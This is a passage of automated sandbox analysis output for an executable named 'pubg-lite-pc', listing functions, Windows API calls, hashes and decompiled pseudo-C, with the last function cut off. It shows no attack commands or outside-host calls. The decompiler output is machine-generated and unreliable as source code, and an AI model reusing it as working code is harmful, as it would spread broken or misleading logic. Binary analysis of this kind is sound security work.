                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileInfoVersion$Size
                                                                                                • String ID: ProductName$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
                                                                                                • API String ID: 2104008232-2149928195
                                                                                                • Opcode ID: 00c83d6dc1ed6aeb9bf02eae37d0b61c42ec425d5154cfc9118cb7bf3ecec55c
                                                                                                • Instruction ID: 565a9b8f15095c8b1bc2d0e73535be230c59ce887f95177c3608868227936698
                                                                                                • Opcode Fuzzy Hash: 00c83d6dc1ed6aeb9bf02eae37d0b61c42ec425d5154cfc9118cb7bf3ecec55c
                                                                                                • Instruction Fuzzy Hash: 0471AD7190110AAFDB14DFA8C949ABEB7BCEF95314F148129E911A7292DB709D04CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009F0080 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 009EFBF0: SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,F4D3B90A,00000000,00000000,?), ref: 009EFD2D
                                                                                                • GetFileVersionInfoSizeW.KERNELBASE(?,000000FF,Shlwapi.dll,F4D3B90A,00000000,?,?,00000000,00A8CA45,000000FF,Shlwapi.dll,009F0036,?,?,?), ref: 009F00CD
                                                                                                • GetFileVersionInfoW.KERNELBASE(?,?,?,00000000,00000000,?,?), ref: 009F00F9
                                                                                                • GetLastError.KERNEL32(?,?), ref: 009F013E
                                                                                                • DeleteFileW.KERNEL32(?), ref: 009F0151
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$InfoVersion$DeleteErrorFolderLastPathSize
                                                                                                • String ID: Shlwapi.dll
                                                                                                • API String ID: 2825328469-1687636465
                                                                                                • Opcode ID: 01f47b63300a430a75edd1fc1d1fcc9e9fd607a23ddf59f884c4feed3feada2c
                                                                                                • Instruction ID: 49bdf91c94198701c5dda061c396e298b6d90bfb3d7199b3ee9b7a969fa8c9b6
                                                                                                • Opcode Fuzzy Hash: 01f47b63300a430a75edd1fc1d1fcc9e9fd607a23ddf59f884c4feed3feada2c
                                                                                                • Instruction Fuzzy Hash: 4B31BE75E04209ABDB10CFA5CD84BEFBBBCFF49310F14412AE905A3292DB349944CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009EF860 Relevance: 7.7, APIs: 5, Instructions: 158threadsynchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,F4D3B90A,?,?,00000000,?,?,?,00A8C97D,000000FF,?,009D07CD,?), ref: 009EF89D
                                                                                                  • Part of subcall function 009311F0: RaiseException.KERNEL32(00000000,00000000,00000000,00000000,00A4308A,C000008C,00000001,?,00A430BB,00000000,?,009351A7,00000000,F4D3B90A,000000FF,?), ref: 009311FC
                                                                                                • CreateThread.KERNEL32(00000000,00000000,009EFBE0,?,00000000,?), ref: 009EF8D3
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 009EF9BA
                                                                                                • GetExitCodeThread.KERNEL32(00000000,?), ref: 009EF9C5
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009EF9E5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateThread$CloseCodeEventExceptionExitHandleObjectRaiseSingleWait
                                                                                                • String ID:
                                                                                                • API String ID: 3595790897-0
                                                                                                • Opcode ID: 5d2cfb3839d287aab99ed3a19f6bf183926eb8f49c2a1ec899c896c909b8d70d
                                                                                                • Instruction ID: 4d7bbe23b6295c96d6ad69dec7ad0590c13eaa2f20ed7dde42fbc33fc12be8a0
                                                                                                • Opcode Fuzzy Hash: 5d2cfb3839d287aab99ed3a19f6bf183926eb8f49c2a1ec899c896c909b8d70d
                                                                                                • Instruction Fuzzy Hash: 86515C71A00705DFCB10CFA9C885F9AB7F4FF49710F14866AE956AB3A2D770A840CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009CC8D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 326COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • PathIsUNCW.SHLWAPI(?,F4D3B90A,?,00000010,?), ref: 009CCB9A
                                                                                                  • Part of subcall function 009DD980: GetCurrentProcess.KERNEL32 ref: 009DD9C8
                                                                                                  • Part of subcall function 009DD980: OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 009DD9D5
                                                                                                  • Part of subcall function 009DD980: GetLastError.KERNEL32 ref: 009DD9DF
                                                                                                  • Part of subcall function 009DD980: CloseHandle.KERNEL32(00000000), ref: 009DDAC0
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                  • Part of subcall function 00935370: FindResourceW.KERNEL32(00000000,?,00000006,?,000000FF,?,009EB3FB,\\.\pipe\ToServer,?,?,?,00000000,00A7C506,000000FF,?,80004005), ref: 00935397
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CloseCurrentErrorFindHandleHeapLastOpenPathResourceToken
                                                                                                • String ID: Extraction path set to:$[WindowsVolume]$\\?\
                                                                                                • API String ID: 1971330335-3538578949
                                                                                                • Opcode ID: 64aac3b4ae9996a585e8aa462b8aad9e04a596fb63fc6f9b85d40ede7a4fea7b
                                                                                                • Instruction ID: 048df397786ef8a1cf288a8076928f27e97b2eb52857d482a3ed4948358a1c89
                                                                                                • Opcode Fuzzy Hash: 64aac3b4ae9996a585e8aa462b8aad9e04a596fb63fc6f9b85d40ede7a4fea7b
                                                                                                • Instruction Fuzzy Hash: CEC1C27090164A9FDB04DFA8C898FAEFBB5EF45314F14826CE419AB292DB70DD04CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009EB140 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 229filepipeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ConnectNamedPipe.KERNEL32(?,00000000,F4D3B90A,?,000000FF,?,00000000,00A8BBB6,000000FF,?,009EB35A,000000FF,?,00000001), ref: 009EB17A
                                                                                                • GetLastError.KERNEL32(?,009EB35A,000000FF,?,00000001), ref: 009EB184
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                • ReadFile.KERNEL32(?,?,00007F90,00000000,00000000,F4D3B90A,?,000000FF,?,00000000,00A8BBB6,000000FF,?,009EB35A,000000FF,?), ref: 009EB1C7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConnectErrorFileHeapLastNamedPipeProcessRead
                                                                                                • String ID: \\.\pipe\ToServer
                                                                                                • API String ID: 2988993950-63420281
                                                                                                • Opcode ID: 8bae13d257e0a5d1ce09f514a047e6d07adb4542d75f24887bce7be665344e5a
                                                                                                • Instruction ID: dd2f63cc14bef60730c071e42e96058e117acab0f497cce3961bc614b0dafedb
                                                                                                • Opcode Fuzzy Hash: 8bae13d257e0a5d1ce09f514a047e6d07adb4542d75f24887bce7be665344e5a
                                                                                                • Instruction Fuzzy Hash: A771CD71A04248EFDB15CF59C805BAFB7A8FF54324F10866EE9259B391DBB5AD00CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D964820 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 59%
                                                                                                			E6D964820(void* __ebx, long __ecx, void* __esi) {
				void* __ebp;
				signed int _t24;
				signed int _t25;
				int _t31;
				void* _t35;
				signed int _t43;
				void* _t52;
				void* _t53;
				int* _t55;
				signed int _t57;
				void* _t58;

				_t42 = __ecx;
				_t57 = _t58 - 0x414;
				_t24 =  *0x6d9e5024; // 0xe85bfa76
				_t25 = _t24 ^ _t57;
				 *(_t57 + 0x410) = _t25;
				 *[fs:0x0] = _t57 - 0xc;
				_t55 = __ecx;
				 *(_t57 - 0x10) = __ecx;
				 *((intOrPtr*)(_t57 - 0x18)) = __ecx;
				 *(_t57 - 0x14) = 0;
				 *(_t57 - 0x10) = 0;
				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t57 + 0x208, _t25, __esi,  *[fs:0x0], 0x6d9a721e, 0xffffffff);
				 *((short*)(_t57 + 0x20e)) = 0;
				_t31 = GetVolumeInformationW(_t57 + 0x208, 0, 0, _t57 - 0x10, 0, 0, 0, 0); // executed
				if(_t31 != 0) {
					E6D964F30(_t42, _t57, L"%08X",  *(_t57 - 0x10));
					_t55[4] = 0;
					_t55[5] = 7;
					_t43 = _t57;
					 *_t55 = 0;
					_t53 = _t43 + 2;
					do {
						_t35 =  *_t43;
						_t43 = _t43 + 2;
					} while (_t35 != 0);
					_push(_t43 - _t53 >> 1);
					_push(_t57);
					L6D965AF0(__ebx, _t55, _t53);
				} else {
					_push(8);
					_t55[4] = _t31;
					_t55[5] = 7;
					_push(L"AABBCCDD");
					 *_t55 = _t31;
					L6D965AF0(__ebx, _t55, _t52);
				}
				 *(_t57 - 4) = 0;
				 *(_t57 - 0x14) = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t57 - 0xc));
				return L6D98A13F( *(_t57 + 0x410) ^ _t57);
			}














                                                                                                0x6d964820
                                                                                                0x6d964821
                                                                                                0x6d96483f
                                                                                                0x6d964844
                                                                                                0x6d964846
                                                                                                0x6d964851
                                                                                                0x6d964857
                                                                                                0x6d964859
                                                                                                0x6d964862
                                                                                                0x6d96486c
                                                                                                0x6d964875
                                                                                                0x6d96487c
                                                                                                0x6d964888
                                                                                                0x6d96489e
                                                                                                0x6d9648a6
                                                                                                0x6d9648d1
                                                                                                0x6d9648d9
                                                                                                0x6d9648e2
                                                                                                0x6d9648e9
                                                                                                0x6d9648ec
                                                                                                0x6d9648ef
                                                                                                0x6d9648f2
                                                                                                0x6d9648f2
                                                                                                0x6d9648f5
                                                                                                0x6d9648f8
                                                                                                0x6d964904
                                                                                                0x6d964905
                                                                                                0x6d964908
                                                                                                0x6d9648a8
                                                                                                0x6d9648a8
                                                                                                0x6d9648aa
                                                                                                0x6d9648af
                                                                                                0x6d9648b6
                                                                                                0x6d9648bb
                                                                                                0x6d9648be
                                                                                                0x6d9648be
                                                                                                0x6d96490d
                                                                                                0x6d964914
                                                                                                0x6d964920
                                                                                                0x6d96493d

                                                                                                APIs
                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,E85BFA76,00000034), ref: 6D96487C
                                                                                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 6D96489E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: FolderInformationPathVolume
                                                                                                • String ID: %08X$AABBCCDD
                                                                                                • API String ID: 1564939276-726327320
                                                                                                • Opcode ID: 1f683a2bb7573e84a5809954a34e09998db644e7ca9d6d9ca60af97bbc155dfa
                                                                                                • Instruction ID: b06f28c05633c51527db6f20ec686df80ad76bb526cc1107b08539962052df69
                                                                                                • Opcode Fuzzy Hash: 1f683a2bb7573e84a5809954a34e09998db644e7ca9d6d9ca60af97bbc155dfa
                                                                                                • Instruction Fuzzy Hash: DC316FB1914389AFEB64CF64CD45BFA77B8FF08704F00452EE9159B281E7B4A604CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009C58D0 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,F4D3B90A,?,00000010,?,009C8850,00A84D1E), ref: 009C5936
                                                                                                • SetFilePointer.KERNEL32(00000000,?,00000010,00000000), ref: 009C597F
                                                                                                • ReadFile.KERNEL32(00000000,F4D3B90A,?,00A84D1E,00000000,00000078,?), ref: 009C59BD
                                                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 009C5A09
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                                                                                                • String ID:
                                                                                                • API String ID: 2405668454-0
                                                                                                • Opcode ID: f730d829ebc129056c0cd40849d9502f2ff118b5a83c747bcedd60ee125efc22
                                                                                                • Instruction ID: 4ffda6c56dcb1dfa67795f42309496261805d70a07381d5f84f0977bc20eb9a2
                                                                                                • Opcode Fuzzy Hash: f730d829ebc129056c0cd40849d9502f2ff118b5a83c747bcedd60ee125efc22
                                                                                                • Instruction Fuzzy Hash: BC419F70D01609EBDB11CB98CC88FEEF7B8EF45324F24825AE511A72D1DB74A945CB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B3690 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 342COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                • PathIsUNCW.SHLWAPI(?,?), ref: 009B3820
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: HeapPathProcess
                                                                                                • String ID: \\?\$\\?\UNC\
                                                                                                • API String ID: 300331711-3019864461
                                                                                                • Opcode ID: e8826836f056bc7ad2c4a34e62a12b9369500900718022f12496522c32ca3deb
                                                                                                • Instruction ID: cc208998364bb48b3aff58150293540973412c2436d986c9b2156cc1612d7cdd
                                                                                                • Opcode Fuzzy Hash: e8826836f056bc7ad2c4a34e62a12b9369500900718022f12496522c32ca3deb
                                                                                                • Instruction Fuzzy Hash: FAC18071A00509DFDB00DBA8C985BEEF7B8FF89324F148269E415E7291DB749A04CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D982EE0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 338COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 66%
                                                                                                			E6D982EE0(signed int __ebx, signed int __ecx, signed int __edx, void* __edi, void* __eflags, signed int _a512, void* _a516) {
				struct _SECURITY_ATTRIBUTES* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				char _v16;
				WCHAR* _v20;
				char _v21;
				struct _SECURITY_ATTRIBUTES* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				struct _SECURITY_ATTRIBUTES* _v40;
				signed int _v44;
				struct _SECURITY_ATTRIBUTES* _v48;
				char _v92;
				char _v676;
				void* __esi;
				signed int _t155;
				signed int _t158;
				signed int _t159;
				signed int _t162;
				signed int _t165;
				void* _t167;
				signed int _t170;
				signed int _t171;
				signed int _t173;
				struct HINSTANCE__* _t176;
				signed int _t179;
				signed int _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t194;
				int _t203;
				intOrPtr* _t220;
				void* _t223;
				int _t225;
				signed int _t229;
				intOrPtr* _t231;
				void* _t247;
				void* _t266;
				void* _t271;
				void* _t281;
				void* _t288;
				signed int _t304;
				signed int* _t305;
				signed int _t306;
				signed int _t312;
				signed int _t330;
				intOrPtr* _t333;
				void* _t357;
				short* _t361;
				intOrPtr* _t364;
				intOrPtr* _t367;
				short* _t369;
				intOrPtr* _t372;
				intOrPtr* _t374;
				intOrPtr* _t376;
				signed int _t378;
				signed int _t381;
				void* _t383;
				signed int _t384;
				WCHAR* _t385;
				signed int _t386;
				signed int* _t387;
				signed int _t388;
				void* _t392;
				WCHAR* _t395;
				intOrPtr* _t396;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t406;
				signed int _t407;

				_t304 = __ecx;
				_t298 = __ebx;
				_t399 = _t406;
				_push(0xffffffff);
				_push(0x6d9b91bf);
				_push( *[fs:0x0]);
				_t407 = _t406 - 0x24;
				_push(__ebx);
				_push(_t385);
				_push(__edi);
				_t155 =  *0x6d9e5024; // 0xe85bfa76
				_push(_t155 ^ _t399);
				 *[fs:0x0] =  &_v16;
				_t378 = __edx;
				_v32 = __ecx;
				_v24 = 0;
				_t158 = L6D966B50();
				if(_t158 == 0) {
					L34:
					_t159 = E6D966820(0x80004005);
					goto L35;
				} else {
					_t385 =  *_t158;
					_t304 = _t158;
					_v20 =  *((intOrPtr*)(_t385 + 0xc))() + 0x10;
					_v8 = 1;
					_t220 = L6D966B50();
					if(_t220 == 0) {
						goto L34;
					} else {
						_v28 =  *((intOrPtr*)( *_t220 + 0xc))() + 0x10;
						_v8 = 3;
						_t330 = __edx;
						_t223 = E6D982E30();
						_t298 = __ebx | 0xffffffff;
						if(_t223 == 0) {
							_t331 =  &_v20;
							L6D9661C0(_t298,  &_v20, _t378, _t385, _t378);
						} else {
							_t266 =  *_t378;
							if( *((intOrPtr*)(_t266 - 0xc)) < 0) {
								L9:
								_v8 = 6;
								_push( *((intOrPtr*)( *_t378 - 0xc)) + 0xfffffffc);
								_t271 = L6D97E150(_t298, _t378,  &_v36, 4);
								_v24 = 2;
								L6D9661C0(_t298,  &_v20, _t378, _t385, _t271);
								_v24 = 2;
								_v24 = 0;
								_v8 = 3;
								_t374 = _v36 + 0xfffffff0;
								asm("lock xadd [edx+0xc], eax");
								__eflags = _t298 - 1;
								if(_t298 - 1 <= 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t374)) + 4))(_t374);
								}
								_t331 =  &_v28;
								L6D966370(_t298,  &_v28, L"\\\\?\\", 4);
							} else {
								_push(L"\\\\?\\UNC\\");
								_push(_t266);
								_t281 = L6D98B95E(_t330);
								_t407 = _t407 + 8;
								if(_t281 == 0 || _t281 -  *_t378 >> 1 == _t298) {
									goto L9;
								} else {
									_v8 = 4;
									_push( *((intOrPtr*)( *_t378 - 0xc)) + 0xfffffff8);
									_t288 = L6D97E150(_t298, _t378,  &_v36, 8);
									_v24 = 1;
									L6D9661C0(_t298,  &_v20, _t378, _t385, _t288);
									_v24 = 1;
									_v24 = 0;
									_v8 = 3;
									_t376 = _v36 + 0xfffffff0;
									asm("lock xadd [edx+0xc], eax");
									if(_t298 - 1 <= 0) {
										 *((intOrPtr*)( *((intOrPtr*)( *_t376)) + 4))(_t376);
									}
									_t331 =  &_v28;
									L6D966370(_t298,  &_v28, L"\\\\?\\UNC\\", 8);
								}
							}
						}
						_t395 = _v20;
						_t225 = PathIsUNCW(_t395);
						asm("sbb eax, eax");
						_t229 = ( ~(_t225 - 1) & 0xfffffffe) + 2;
						if(_t229 >=  *(_t395 - 0xc)) {
							L16:
							_t381 =  *(_t395 - 0xc);
						} else {
							_push(0x5c);
							_push( &(_t395[_t229]));
							_t383 = L6D98BBEB(_t331);
							_t407 = _t407 + 8;
							if(_t383 == 0) {
								goto L16;
							} else {
								_t384 = _t383 - _t395;
								_t381 = _t384 >> 1;
								if(_t384 < 0) {
									goto L16;
								}
							}
						}
						_push(_t381);
						_t231 = L6D97E150(_t298, _t381,  &_v36, 0);
						_v8 = 8;
						_t333 =  &_v28;
						L6D966370(_t298, _t333,  *_t231,  *((intOrPtr*)( *_t231 - 0xc)));
						_v8 = 3;
						_t364 = _v36 + 0xfffffff0;
						asm("lock xadd [edx+0xc], eax");
						if(_t298 - 1 <= 0) {
							_t333 =  *_t364;
							 *((intOrPtr*)( *_t333 + 4))(_t364);
						}
						_push(1 + _t381);
						_push(_t333);
						L6D981BC0( &_v20, _t381, _t395);
						_t385 = _v28;
						_t430 =  *((intOrPtr*)(_t385 - 0xc));
						if( *((intOrPtr*)(_t385 - 0xc)) != 0) {
							_v48 = 0;
							_v44 = 0;
							_v40 = 0;
							_v8 = 0xc;
							L6D9765F0(_t298,  &_v36, _t381, _t385, __eflags);
							_v8 = 0xd;
							L6D983630( &_v48,  &_v20,  &_v36);
							_t407 = _t407 - 8 + 4;
							_v8 = 0xc;
							_t367 = _v36 + 0xfffffff0;
							asm("lock xadd [edx+0xc], eax");
							__eflags = _t298 - 1;
							if(_t298 - 1 <= 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t367)) + 4))(_t367);
							}
							L6D9682E0(_v32,  &_v28);
							_t159 = _v44;
							_t378 = 0;
							_t304 = _t159;
							_v36 = _t304;
							__eflags = _t304;
							if(_t304 <= 0) {
								L28:
								_v8 = 3;
								L6D96FB20();
								goto L29;
							} else {
								while(1) {
									__eflags = _t378 - _t159;
									if(_t378 >= _t159) {
										break;
									}
									_t304 = _v32;
									L6D9682E0(_t304, _v48 + _t378 * 4);
									_t378 = 1 + _t378;
									__eflags = _t378 - _v36;
									if(_t378 >= _v36) {
										goto L28;
									} else {
										_t159 = _v44;
										continue;
									}
									goto L71;
								}
								L35:
								L6D96FDD0(_t159, 0xc000008c, 1);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t399);
								_t400 = _t407;
								_push(0xffffffff);
								_push(0x6d9b9215);
								_push( *[fs:0x0]);
								_push(_t298);
								_push(_t385);
								_push(_t378);
								_t162 =  *0x6d9e5024; // 0xe85bfa76
								_push(_t162 ^ _t400);
								 *[fs:0x0] =  &_v92;
								_t386 = _t304; // executed
								_t165 = E6D982CF0(_t304, _t378, _t386); // executed
								__eflags = _t165;
								if(_t165 == 0) {
									__eflags = PathIsUNCW( *_t386) - 1;
									_v48 = 0;
									_v44 = 0;
									_v21 = __eflags == 0;
									_v40 = 0;
									_v12 = 0;
									_t356 = _t386;
									_t305 =  &_v48;
									_t167 = E6D982EE0(_t298, _t305, _t386, _t378, __eflags);
									__eflags = _v44;
									if(_v44 <= 0) {
										L57:
										L6D96FDD0(_t167, 0xc000008c, 1);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t401 =  &_v676;
										_t170 =  *0x6d9e5024; // 0xe85bfa76
										_t171 = _t170 ^ _t401;
										_a512 = _t171;
										 *[fs:0x0] =  &_v20;
										_t387 = _t305;
										_v28 = _t387;
										_t173 = _t401;
										_v32 = _t387;
										_v24 = 0;
										__imp__SHGetSpecialFolderPathW(0, _t173, 0x1c, 0, _t171, _t386,  *[fs:0x0], 0x6d9b926e, 0xffffffff, _t400); // executed
										__eflags = _t173;
										if(_t173 == 0) {
											_t306 = L6D966B50();
											__eflags = _t306;
											if(_t306 == 0) {
												goto L68;
											} else {
												_t179 =  *((intOrPtr*)( *_t306 + 0xc))() + 0x10;
												__eflags = _t179;
												 *_t387 = _t179;
												goto L67;
											}
										} else {
											_t306 = L6D966B50();
											__eflags = _t306;
											if(_t306 == 0) {
												L68:
												E6D966820(0x80004005);
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t387);
												_t388 = _t306;
												_t176 =  *(_t388 + 4);
												__eflags = _t176;
												if(_t176 != 0) {
													_t176 = FreeLibrary(_t176);
													 *(_t388 + 4) = 0;
												}
												return _t176;
											} else {
